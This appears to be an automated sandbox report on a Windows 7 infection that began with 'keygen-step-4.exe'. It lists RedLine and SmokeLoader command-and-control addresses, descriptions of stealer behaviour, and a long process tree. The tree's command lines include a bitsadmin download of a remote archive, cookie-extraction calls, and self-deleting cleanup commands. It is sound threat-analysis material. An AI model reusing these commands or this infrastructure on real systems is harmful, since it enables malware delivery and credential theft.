Resubmissions

08-07-2021 12:18

210708-8z6d5h8z2n 10

06-07-2021 17:53

210706-g6we6sa7sa 10

19-06-2021 18:17

210619-vr8bj2dzfn 10

17-06-2021 21:39

210617-a9cvlnmrbx 10

11-06-2021 17:26

210611-wvab1yw2tj 10

08-06-2021 06:47

210608-qrbpch3y46 10

08-06-2021 06:47

210608-64tndgm1ln 10

05-06-2021 18:40

210605-cd6qpr55sx 10

04-06-2021 11:56

210604-5c416rs3ns 10

04-06-2021 08:52

210604-jy9885jen2 10

Analysis

  • max time kernel
    1796s
  • max time network
    1790s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    28-04-2021 04:33

General

Malware Config

Extracted

Family

redline

Botnet

EUU

C2

download3.info:80

Extracted

Family

redline

Botnet

1414

C2

188.119.112.16:46409

Extracted

Family

smokeloader

Version

2020

C2

http://al-commandoz.com/upload/

http://antalya-belek.com/upload/

http://luxurysv.com/upload/

http://massagespijkenisse.com/upload/

http://rexgorellhondaevent.com/upload/

http://999080321newfolder1002002131-service1002.space/

http://999080321newfolder1002002231-service1002.space/

http://999080321newfolder3100231-service1002.space/

http://999080321newfolder1002002431-service1002.space/

http://999080321newfolder1002002531-service1002.space/

http://999080321newfolder33417-012425999080321.space/

http://999080321test125831-service10020125999080321.space/

http://999080321test136831-service10020125999080321.space/

http://999080321test147831-service10020125999080321.space/

http://999080321test146831-service10020125999080321.space/

http://999080321test134831-service10020125999080321.space/

http://999080321est213531-service1002012425999080321.ru/

http://999080321yes1t3481-service10020125999080321.ru/

http://999080321test13561-service10020125999080321.su/

http://999080321test14781-service10020125999080321.info/

rc4.i32
rc4.i32
rc4.i32
rc4.i32

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 6 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • WarzoneRat, AveMaria

    WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.

  • Windows security bypass 2 TTPs
  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 64 IoCs
  • Drops startup file 2 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 11 IoCs
  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Program crash 1 IoCs
  • Drops file in System32 directory 18 IoCs
  • Suspicious use of SetThreadContext 12 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 24 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 55 IoCs
  • Modifies data under HKEY_USERS 48 IoCs
  • Modifies registry class 16 IoCs
  • Modifies system certificate store 2 TTPs 14 IoCs
  • NTFS ADS 5 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 9 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious behavior: MapViewOfSection 50 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 13 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of SetWindowsHookEx 28 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\services.exe
    C:\Windows\system32\services.exe
    1⤵
      PID:468
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k netsvcs
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in System32 directory
        • Suspicious use of SetThreadContext
        • Drops file in Windows directory
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:848
        • C:\Windows\system32\wbem\WMIADAP.EXE
          wmiadap.exe /F /T /R
          3⤵
            PID:1160
          • C:\Windows\system32\taskeng.exe
            taskeng.exe {9D377DDF-2B6C-4E40-B819-C3920F38D9DE} S-1-5-21-2513283230-931923277-594887482-1000:MRBKYMNO\Admin:Interactive:[1]
            3⤵
              PID:2100
              • C:\Users\Admin\AppData\Roaming\cbfcrjj
                C:\Users\Admin\AppData\Roaming\cbfcrjj
                4⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                PID:1664
                • C:\Users\Admin\AppData\Roaming\cbfcrjj
                  C:\Users\Admin\AppData\Roaming\cbfcrjj
                  5⤵
                  • Executes dropped EXE
                  • Checks SCSI registry key(s)
                  • Suspicious behavior: MapViewOfSection
                  PID:2256
              • C:\Users\Admin\AppData\Roaming\wafcrjj
                C:\Users\Admin\AppData\Roaming\wafcrjj
                4⤵
                • Executes dropped EXE
                • Checks SCSI registry key(s)
                • Suspicious behavior: MapViewOfSection
                PID:2096
            • C:\Windows\system32\taskeng.exe
              taskeng.exe {8047B8AF-84B1-4723-A144-D58A1029B2B0} S-1-5-21-2513283230-931923277-594887482-1000:MRBKYMNO\Admin:Interactive:[1]
              3⤵
                PID:1056
                • C:\Users\Admin\AppData\Roaming\cbfcrjj
                  C:\Users\Admin\AppData\Roaming\cbfcrjj
                  4⤵
                  • Executes dropped EXE
                  • Suspicious use of SetThreadContext
                  PID:1376
                  • C:\Users\Admin\AppData\Roaming\cbfcrjj
                    C:\Users\Admin\AppData\Roaming\cbfcrjj
                    5⤵
                    • Executes dropped EXE
                    • Checks SCSI registry key(s)
                    • Suspicious behavior: MapViewOfSection
                    PID:2516
                • C:\Users\Admin\AppData\Roaming\wafcrjj
                  C:\Users\Admin\AppData\Roaming\wafcrjj
                  4⤵
                  • Executes dropped EXE
                  • Checks SCSI registry key(s)
                  • Suspicious behavior: MapViewOfSection
                  PID:776
              • C:\Windows\system32\taskeng.exe
                taskeng.exe {5A4C0F8F-A40A-4875-85B1-995F55656F00} S-1-5-21-2513283230-931923277-594887482-1000:MRBKYMNO\Admin:Interactive:[1]
                3⤵
                  PID:2692
                  • C:\Users\Admin\AppData\Roaming\cbfcrjj
                    C:\Users\Admin\AppData\Roaming\cbfcrjj
                    4⤵
                    • Executes dropped EXE
                    • Suspicious use of SetThreadContext
                    PID:2064
                    • C:\Users\Admin\AppData\Roaming\cbfcrjj
                      C:\Users\Admin\AppData\Roaming\cbfcrjj
                      5⤵
                      • Executes dropped EXE
                      • Checks SCSI registry key(s)
                      • Suspicious behavior: MapViewOfSection
                      PID:2176
                  • C:\Users\Admin\AppData\Roaming\wafcrjj
                    C:\Users\Admin\AppData\Roaming\wafcrjj
                    4⤵
                    • Executes dropped EXE
                    • Checks SCSI registry key(s)
                    • Suspicious behavior: MapViewOfSection
                    PID:2632
                • C:\Windows\system32\taskeng.exe
                  taskeng.exe {0796FA30-A6C8-499E-8187-D4E85DBAA9F7} S-1-5-18:NT AUTHORITY\System:Service:
                  3⤵
                    PID:2680
                    • C:\Windows\system32\rundll32.exe
                      C:\Windows\system32\rundll32.exe "C:\Program Files (x86)\HjhHaWQ\HjhHaWQ.dll",HjhHaWQ
                      4⤵
                      • Windows security modification
                      • Drops file in System32 directory
                      • Modifies data under HKEY_USERS
                      PID:644
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k SystemNetworkService
                  2⤵
                  • Checks processor information in registry
                  • Modifies data under HKEY_USERS
                  • Modifies registry class
                  PID:1684
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k SystemNetworkService
                  2⤵
                  • Drops file in System32 directory
                  • Checks processor information in registry
                  • Modifies data under HKEY_USERS
                  • Modifies registry class
                  PID:1316
              • C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe
                "C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe"
                1⤵
                • Loads dropped DLL
                • Checks whether UAC is enabled
                • Suspicious use of WriteProcessMemory
                PID:1856
                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
                  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe"
                  2⤵
                  • Executes dropped EXE
                  • Suspicious use of SetWindowsHookEx
                  • Suspicious use of WriteProcessMemory
                  PID:2044
                  • C:\Windows\SysWOW64\rundll32.exe
                    "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                    3⤵
                    • Loads dropped DLL
                    • Modifies registry class
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of WriteProcessMemory
                    PID:1260
                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe"
                  2⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1448
                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                  2⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of WriteProcessMemory
                  PID:1396
                  • C:\Users\Admin\AppData\Local\Temp\is-GRRHV.tmp\Install.tmp
                    "C:\Users\Admin\AppData\Local\Temp\is-GRRHV.tmp\Install.tmp" /SL5="$30182,235791,152064,C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                    3⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of WriteProcessMemory
                    PID:1800
                    • C:\Users\Admin\AppData\Local\Temp\is-JCOAM.tmp\Ultra.exe
                      "C:\Users\Admin\AppData\Local\Temp\is-JCOAM.tmp\Ultra.exe" /S /UID=burnerch1
                      4⤵
                      • Drops file in Drivers directory
                      • Executes dropped EXE
                      • Adds Run key to start application
                      • Drops file in Program Files directory
                      • Modifies system certificate store
                      • Suspicious use of WriteProcessMemory
                      PID:1704
                      • C:\Program Files\Windows NT\JKSNCFFSAS\ultramediaburner.exe
                        "C:\Program Files\Windows NT\JKSNCFFSAS\ultramediaburner.exe" /VERYSILENT
                        5⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Suspicious use of WriteProcessMemory
                        PID:1696
                        • C:\Users\Admin\AppData\Local\Temp\is-D9N3H.tmp\ultramediaburner.tmp
                          "C:\Users\Admin\AppData\Local\Temp\is-D9N3H.tmp\ultramediaburner.tmp" /SL5="$3018A,281924,62464,C:\Program Files\Windows NT\JKSNCFFSAS\ultramediaburner.exe" /VERYSILENT
                          6⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Drops file in Program Files directory
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of FindShellTrayWindow
                          PID:320
                          • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                            "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                            7⤵
                            • Executes dropped EXE
                            PID:300
                      • C:\Users\Admin\AppData\Local\Temp\7d-5878b-4ab-24b97-2f18ad17b9618\Hapumybypy.exe
                        "C:\Users\Admin\AppData\Local\Temp\7d-5878b-4ab-24b97-2f18ad17b9618\Hapumybypy.exe"
                        5⤵
                        • Executes dropped EXE
                        PID:360
                        • C:\Program Files\Internet Explorer\iexplore.exe
                          "C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
                          6⤵
                          • Modifies Internet Explorer settings
                          • Suspicious behavior: GetForegroundWindowSpam
                          • Suspicious use of FindShellTrayWindow
                          • Suspicious use of SetWindowsHookEx
                          PID:1780
                          • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                            "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1780 CREDAT:275457 /prefetch:2
                            7⤵
                            • Modifies Internet Explorer settings
                            • Suspicious use of SetWindowsHookEx
                            PID:1692
                          • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                            "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1780 CREDAT:209943 /prefetch:2
                            7⤵
                            • Modifies Internet Explorer settings
                            • NTFS ADS
                            • Suspicious use of SetWindowsHookEx
                            PID:2276
                          • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                            "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1780 CREDAT:340994 /prefetch:2
                            7⤵
                            • Modifies Internet Explorer settings
                            • Suspicious use of SetWindowsHookEx
                            PID:2740
                          • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                            "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1780 CREDAT:996366 /prefetch:2
                            7⤵
                            • Modifies Internet Explorer settings
                            • Suspicious use of SetWindowsHookEx
                            PID:2268
                          • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                            "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1780 CREDAT:865292 /prefetch:2
                            7⤵
                            • Modifies Internet Explorer settings
                            • Suspicious use of SetWindowsHookEx
                            PID:1472
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 1472 -s 1432
                              8⤵
                              • Program crash
                              • Suspicious behavior: GetForegroundWindowSpam
                              PID:876
                          • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                            "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1780 CREDAT:865307 /prefetch:2
                            7⤵
                            • Modifies Internet Explorer settings
                            • Suspicious use of SetWindowsHookEx
                            PID:2224
                        • C:\Program Files\Internet Explorer\iexplore.exe
                          "C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad
                          6⤵
                            PID:2920
                        • C:\Users\Admin\AppData\Local\Temp\24-96de3-d03-5a8bc-3df53623f0537\Paekygibina.exe
                          "C:\Users\Admin\AppData\Local\Temp\24-96de3-d03-5a8bc-3df53623f0537\Paekygibina.exe"
                          5⤵
                          • Executes dropped EXE
                          • Suspicious behavior: EnumeratesProcesses
                          PID:1180
                          • C:\Windows\System32\cmd.exe
                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\502lhqbi.2nu\skipper.exe /s & exit
                            6⤵
                              PID:2692
                              • C:\Users\Admin\AppData\Local\Temp\502lhqbi.2nu\skipper.exe
                                C:\Users\Admin\AppData\Local\Temp\502lhqbi.2nu\skipper.exe /s
                                7⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                PID:2956
                                • C:\Users\Admin\AppData\Local\Temp\1113034091.exe
                                  C:\Users\Admin\AppData\Local\Temp\1113034091.exe
                                  8⤵
                                  • Executes dropped EXE
                                  • Suspicious use of SetThreadContext
                                  PID:2012
                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                    C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                    9⤵
                                      PID:2124
                                  • C:\Users\Admin\AppData\Local\Temp\672019791.exe
                                    C:\Users\Admin\AppData\Local\Temp\672019791.exe
                                    8⤵
                                    • Executes dropped EXE
                                    • Suspicious use of SetThreadContext
                                    PID:2484
                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                      C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                      9⤵
                                        PID:2928
                                    • C:\Windows\SysWOW64\cmd.exe
                                      "C:\Windows\system32\cmd.exe" /k ping 0 & del C:\Users\Admin\AppData\Local\Temp\502lhqbi.2nu\skipper.exe & exit
                                      8⤵
                                        PID:2380
                                        • C:\Windows\SysWOW64\PING.EXE
                                          ping 0
                                          9⤵
                                          • Runs ping.exe
                                          PID:2660
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xut4edne.unu\001.exe & exit
                                    6⤵
                                      PID:1320
                                      • C:\Users\Admin\AppData\Local\Temp\xut4edne.unu\001.exe
                                        C:\Users\Admin\AppData\Local\Temp\xut4edne.unu\001.exe
                                        7⤵
                                        • Executes dropped EXE
                                        • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                        PID:2732
                                    • C:\Windows\System32\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xonv5jqf.vrf\gpooe.exe & exit
                                      6⤵
                                        PID:668
                                        • C:\Users\Admin\AppData\Local\Temp\xonv5jqf.vrf\gpooe.exe
                                          C:\Users\Admin\AppData\Local\Temp\xonv5jqf.vrf\gpooe.exe
                                          7⤵
                                          • Executes dropped EXE
                                          • Loads dropped DLL
                                          • Adds Run key to start application
                                          • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                          PID:1936
                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                            8⤵
                                            • Executes dropped EXE
                                            PID:2556
                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                            8⤵
                                            • Executes dropped EXE
                                            PID:2860
                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                            8⤵
                                            • Executes dropped EXE
                                            PID:2128
                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                            8⤵
                                            • Executes dropped EXE
                                            PID:2484
                                      • C:\Windows\System32\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qdncoowp.ojv\google-game.exe & exit
                                        6⤵
                                          PID:2452
                                          • C:\Users\Admin\AppData\Local\Temp\qdncoowp.ojv\google-game.exe
                                            C:\Users\Admin\AppData\Local\Temp\qdncoowp.ojv\google-game.exe
                                            7⤵
                                            • Executes dropped EXE
                                            • Drops file in Program Files directory
                                            • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                            • Suspicious use of SetWindowsHookEx
                                            PID:1712
                                            • C:\Windows\SysWOW64\rundll32.exe
                                              "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                                              8⤵
                                              • Loads dropped DLL
                                              • Modifies registry class
                                              PID:2840
                                        • C:\Windows\System32\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\r45x1hom.whj\askinstall39.exe & exit
                                          6⤵
                                            PID:2096
                                            • C:\Users\Admin\AppData\Local\Temp\r45x1hom.whj\askinstall39.exe
                                              C:\Users\Admin\AppData\Local\Temp\r45x1hom.whj\askinstall39.exe
                                              7⤵
                                              • Executes dropped EXE
                                              • Modifies system certificate store
                                              • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                              PID:2700
                                              • C:\Windows\SysWOW64\cmd.exe
                                                cmd.exe /c taskkill /f /im chrome.exe
                                                8⤵
                                                  PID:2836
                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                    taskkill /f /im chrome.exe
                                                    9⤵
                                                    • Kills process with taskkill
                                                    PID:2712
                                            • C:\Windows\System32\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\y52hxr5q.ryb\SunLabsPlayer.exe /S & exit
                                              6⤵
                                                PID:644
                                                • C:\Users\Admin\AppData\Local\Temp\y52hxr5q.ryb\SunLabsPlayer.exe
                                                  C:\Users\Admin\AppData\Local\Temp\y52hxr5q.ryb\SunLabsPlayer.exe /S
                                                  7⤵
                                                  • Executes dropped EXE
                                                  • Loads dropped DLL
                                                  • Drops file in Program Files directory
                                                  • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                  PID:2620
                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsnA085.tmp\tempfile.ps1"
                                                    8⤵
                                                      PID:2140
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsnA085.tmp\tempfile.ps1"
                                                      8⤵
                                                        PID:2288
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsnA085.tmp\tempfile.ps1"
                                                        8⤵
                                                          PID:2816
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsnA085.tmp\tempfile.ps1"
                                                          8⤵
                                                            PID:328
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsnA085.tmp\tempfile.ps1"
                                                            8⤵
                                                              PID:1200
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsnA085.tmp\tempfile.ps1"
                                                              8⤵
                                                              • Drops file in Program Files directory
                                                              PID:2764
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsnA085.tmp\tempfile.ps1"
                                                              8⤵
                                                              • Executes dropped EXE
                                                              • Loads dropped DLL
                                                              • Checks for any installed AV software in registry
                                                              • Checks SCSI registry key(s)
                                                              • Suspicious behavior: MapViewOfSection
                                                              PID:2940
                                                            • C:\Windows\SysWOW64\bitsadmin.exe
                                                              "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                              8⤵
                                                              • Download via BitsAdmin
                                                              PID:2076
                                                            • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                              "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pLZQiSM75KRmgEsZ -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                              8⤵
                                                              • Executes dropped EXE
                                                              • Drops file in Program Files directory
                                                              PID:2536
                                                            • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                              "C:\Program Files (x86)\lighteningplayer\data_load.exe" -plIt7BMSl5CGLPUK -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                              8⤵
                                                              • Executes dropped EXE
                                                              PID:1876
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsnA085.tmp\tempfile.ps1"
                                                              8⤵
                                                              • Drops file in Program Files directory
                                                              PID:2372
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsnA085.tmp\tempfile.ps1"
                                                              8⤵
                                                                PID:2532
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsnA085.tmp\tempfile.ps1"
                                                                8⤵
                                                                  PID:1060
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsnA085.tmp\tempfile.ps1"
                                                                  8⤵
                                                                    PID:740
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsnA085.tmp\tempfile.ps1"
                                                                    8⤵
                                                                      PID:1684
                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                      C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\HjhHaWQ\HjhHaWQ.dll" HjhHaWQ
                                                                      8⤵
                                                                        PID:1784
                                                                        • C:\Windows\system32\rundll32.exe
                                                                          C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\HjhHaWQ\HjhHaWQ.dll" HjhHaWQ
                                                                          9⤵
                                                                          • Drops file in System32 directory
                                                                          PID:2780
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsnA085.tmp\tempfile.ps1"
                                                                        8⤵
                                                                        • Drops file in Program Files directory
                                                                        PID:1144
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsnA085.tmp\tempfile.ps1"
                                                                        8⤵
                                                                          PID:2096
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsnA085.tmp\tempfile.ps1"
                                                                          8⤵
                                                                          • Drops file in Program Files directory
                                                                          PID:588
                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsnA085.tmp\tempfile.ps1"
                                                                          8⤵
                                                                            PID:2948
                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsnA085.tmp\tempfile.ps1"
                                                                            8⤵
                                                                              PID:2680
                                                                            • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                              "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                              8⤵
                                                                              • Executes dropped EXE
                                                                              PID:2976
                                                                        • C:\Windows\System32\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\g4lyqj3j.30n\005.exe & exit
                                                                          6⤵
                                                                            PID:2688
                                                                            • C:\Users\Admin\AppData\Local\Temp\g4lyqj3j.30n\005.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\g4lyqj3j.30n\005.exe
                                                                              7⤵
                                                                              • Executes dropped EXE
                                                                              • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                              PID:868
                                                                          • C:\Windows\System32\cmd.exe
                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\obdlramt.ilw\GcleanerWW.exe /mixone & exit
                                                                            6⤵
                                                                              PID:1528
                                                                            • C:\Windows\System32\cmd.exe
                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\is4mivkl.w1m\toolspab1.exe & exit
                                                                              6⤵
                                                                                PID:2824
                                                                                • C:\Users\Admin\AppData\Local\Temp\is4mivkl.w1m\toolspab1.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\is4mivkl.w1m\toolspab1.exe
                                                                                  7⤵
                                                                                  • Executes dropped EXE
                                                                                  • Loads dropped DLL
                                                                                  • Suspicious use of SetThreadContext
                                                                                  • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                  PID:2916
